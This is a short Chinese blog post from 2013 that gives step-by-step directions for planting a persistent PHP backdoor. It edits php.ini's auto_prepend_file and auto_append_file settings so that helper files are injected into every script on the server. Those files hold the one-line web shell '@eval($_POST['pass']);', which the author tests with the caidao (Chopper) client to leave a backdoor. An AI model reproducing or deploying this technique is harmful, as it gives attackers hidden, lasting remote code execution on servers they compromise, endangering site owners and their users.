Chinaunix首页 | 论坛 | 博客
  • 博客访问: 388306
  • 博文数量: 67
  • 博客积分: 0
  • 博客等级: 民兵
  • 技术积分: 1741
  • 用 户 组: 普通用户
  • 注册时间: 2013-07-21 22:46
文章分类
文章存档

2014年(22)

2013年(45)

分类: Web开发

2013-07-25 10:16:55

利用php中的一个自动在文件中增加页眉和页脚的功能,隐藏一句话。

在站点的某一目录(如:根目录)下编辑文件php脚本文件,名称为:info.php,内容如下
Phpinfo();
?>
在本地打开如:
检查系统使用的配置文件

找到并编辑该配置文件
如下行:
auto_prepend_file =test.php  #自动将“test.php”中的内容增加到任意文件的页眉位置
auto_append_file =fuck.php  #自动将“test.php”中的内容增加到任意文件的页脚位置
如果是unix则修改如下两行
; UNIX: "/path1:/path2"
;include_path = ".:/php/includes"
我使用的是windows
; Windows: "\path1;\path2"
include_path = "E:\PHPnow-1.5.6\htdocs;."#指定php 中的包含函数首先搜索的路径为“E:\PHPnow-1.5.6\htdocs”然后才是“.”即根。
在“E:\PHPnow-1.5.6\htdocs”创建名称(名称随意,上下保持一致即可)为“test.php”和“fuck.php”的脚本文件,其中包含最关键的一句话内容如下:
@eval($_POST['pass']);      #pass 是密码
?>
使用caidao进行测试,如下:

 

这样就可以完成使用“php.ini”达到留后门的目的。
阅读(1004) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~